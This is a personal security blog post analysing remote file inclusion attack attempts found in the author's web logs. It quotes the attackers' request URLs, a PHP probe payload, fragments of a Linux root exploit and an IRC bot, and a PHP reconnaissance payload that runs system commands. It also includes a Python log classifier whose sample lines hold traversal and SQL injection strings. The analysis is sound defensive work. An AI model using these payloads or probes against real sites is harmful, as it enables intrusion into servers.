myf00

Ideas, projects and thoughts by Duarte Silva

New Area Test
2010
03.07
Private Area Test

For a month I have been tracking the requests made to my site, and looking at the logs I was able to find fourteen attack attempts. The attempts originated from the following IP addresses.

41.204.218.*
58.150.99.*
210.116.103.*

The requests made in the attempts were crafted to test for remote file inclusions.

/contrib/yabbse/poc.php?poc_root_path=http://*******.kr/~eco-max/gboard/lib/id1.txt
/include/admin.lib.inc.php?site_path=http://*******.co.za/content_old/themes/a.txt?

The two files, a.txt and id1.txt, used in the requests boiled down to

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

When executed by PHP, the output would contain only FeeLCoMzFeeLCoMz, which is an easy way for the attacker to verify that the site is vulnerable to remote file inclusion.

After checking the IP addresses from where the requests originated, I wasn't surprised to find that they came from the compromised sites that hosted the files. On one of the compromised sites, I was able to list the contents of the directory that contained the id1.txt file.

In that directory there were files indicating that attempts had been made to exploit local privilege escalation vulnerabilities in Linux, some Perl scripts that connect to an IRC server (which isn't available any more) in order to receive orders, and two Python scripts.

# Author: DigitALL
# Version: 2.6.18-20
# Tested on: Linux System
# Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
# Code : 2.6.18 2008 Exploit's İs Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL

#define _GNU_SOURCE
#include <stdio.h>
(...)
#!/usr/bin/perl

print('
########################################
## LoDoyo Scanner Bot v9.1            ##
## By Special Edition By LoDoYo       ##
## ? NOV-Des 2009, NKN - TeaM         ##
########################################
');
######################################################
## Usage:                                           ##
##   perl lodoyocrew.pl <chan w/o #> <server> <port>##
(...)

There were also some text files that are simple logs of the requests made to other sites. Many of the sites that I was able to identify in those log files didn't host, at least not any more, the files belonging to the id1.txt family. This is a good thing, since it reduces the attack's effectiveness. Those log files also contained requests made in order to find log files and AWStats report pages.

I picked eight of those requests and was able to download the access log files for five sites. In those access log files I found a lot of requests that belonged to the same family as the ones made to myf00.

After hacking up a Python script, the logs yielded 289199 requests in total, originating from 1612 unique IP addresses. There were a total of 132 SQL injection attempts, 2082 directory traversals and 251872 remote file inclusion attempts. I could also account for 154 hosts that still host files of the id1.txt family.
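As an added example (not the script used for the numbers above), this is the kind of classifier that turns such access logs into those counts: it labels each request as remote file inclusion, directory traversal or SQL injection and tallies which remote hosts are serving the included files. The log lines, hostnames and addresses are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed combined-format log lines modelled on the probes described in the
# post; the IP addresses and hostnames are placeholders, not real indicators.
SAMPLE_LOG = """\
41.204.218.1 - - [07/Mar/2010:10:01:02 +0000] "GET /contrib/yabbse/poc.php?poc_root_path=http://evil-host.example/~x/id1.txt HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
58.150.99.2 - - [07/Mar/2010:10:01:05 +0000] "GET /include/admin.lib.inc.php?site_path=http://other.example/themes/a.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.8"
210.116.103.3 - - [07/Mar/2010:10:02:00 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 210 "-" "Mozilla/4.0"
210.116.103.3 - - [07/Mar/2010:10:02:10 +0000] "GET /news.php?id=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
192.0.2.10 - - [07/Mar/2010:10:03:00 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Source IP, request line and status from a combined-format access log entry.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def classify(path):
    """Label one request path; returns (labels, hosts named in RFI parameters)."""
    labels, hosts = set(), []
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        # A parameter whose value is a full URL is the RFI signature seen above.
        if re.match(r'(https?|ftp)://', value, re.I):
            labels.add('rfi')
            hosts.append(urlsplit(value).hostname)
    decoded = unquote(path).lower()  # look through %2e%2e%2f-style encoding
    if '../' in decoded or '..\\' in decoded:
        labels.add('traversal')
    if re.search(r"union\s+select|'\s*or\s+|sleep\(|benchmark\(", decoded):
        labels.add('sqli')
    return labels, hosts


def analyse(log_text):
    """Aggregate a log: request and unique-IP counts, per-category counts,
    and how often each remote host appears as an RFI source."""
    stats, ips, rfi_hosts = Counter(), set(), Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format entry; skip it
        stats['requests'] += 1
        ips.add(m.group('ip'))
        labels, hosts = classify(m.group('path'))
        stats.update(labels)
        rfi_hosts.update(hosts)
    stats['unique_ips'] = len(ips)
    return stats, rfi_hosts


if __name__ == '__main__':
    totals, sources = analyse(SAMPLE_LOG)
    print(dict(totals))   # {'requests': 5, 'rfi': 2, 'traversal': 1, 'sqli': 1, 'unique_ips': 4}
    print(dict(sources))  # {'evil-host.example': 1, 'other.example': 1}
```

The hosts counter is the part worth keeping an eye on: it is the list of compromised sites still serving the id1.txt family, and a host that disappears from it is one less working attack.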

There are also some web shells in the list, as well as some variations of the id1.txt file family that print some server-related information when invoked in a remote file inclusion scenario.

<?
echo "Coracore<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "Coracore is my BoyFriend<br>";
exit;
?>
